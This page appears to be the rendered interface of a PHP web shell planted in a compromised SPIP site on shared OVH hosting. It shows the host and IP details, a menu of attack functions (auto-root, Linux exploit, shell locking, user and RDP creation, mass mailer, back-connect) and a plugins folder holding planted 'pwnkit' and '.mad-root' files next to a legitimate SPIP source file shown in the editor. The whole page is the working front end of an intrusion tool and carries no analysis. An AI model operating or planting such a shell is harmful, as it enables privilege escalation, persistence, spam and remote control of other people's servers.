Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
afficher_liste.php
3.62
KB
-rw----r--
afficher_nom_plugin.php
1.84
KB
-rw----r--
afficher_plugin.php
11
KB
-rw----r--
afficher_repertoires.php
3.59
KB
-rw----r--
extraire_boutons.php
1.87
KB
-rw----r--
extraire_pipelines.php
1.27
KB
-rw----r--
get_infos.php
3.72
KB
-rw----r--
infos_paquet.php
12.08
KB
-rw----r--
installer.php
6.75
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
verifie_conformite.php
6.78
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : afficher_nom_plugin.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } include_spip('inc/charsets'); include_spip('inc/texte'); include_spip('plugins/afficher_plugin'); function plugins_afficher_nom_plugin_dist( $url_page, $plug_file, $checked, $actif, $expose = false, $class_li = 'item', $dir_plugins = _DIR_PLUGINS ) { static $versions = []; $erreur = false; $s = ''; $get_infos = charger_fonction('get_infos', 'plugins'); $info = $get_infos($plug_file, false, $dir_plugins); // numerotons les occurences d'un meme prefix $versions[$info['prefix']] ??= 0; $versions[$info['prefix']]++; $id = $info['prefix'] . $versions[$info['prefix']]; $class = $class_li; $class .= $actif ? ' actif' : ''; $class .= $expose ? ' on' : ''; $erreur = isset($info['erreur']); if ($erreur) { $class .= ' error'; } $s .= "<li id='$id' class='$class'>"; // Cartouche Resume $s .= "<div class='resume'>"; $s .= "<strong class='nom'>" . typo($info['nom']) . '</strong>'; $s .= " <span class='version'>" . $info['version'] . '</span>'; $s .= " <span class='etat'> - " . plugin_etat_en_clair($info['etat']) . '</span>'; $s .= '</div>'; if ($erreur) { $s .= "<div class='erreur'>" . join('<br >', $info['erreur']) . '</div>'; } $s .= '</li>'; return $s; }
Close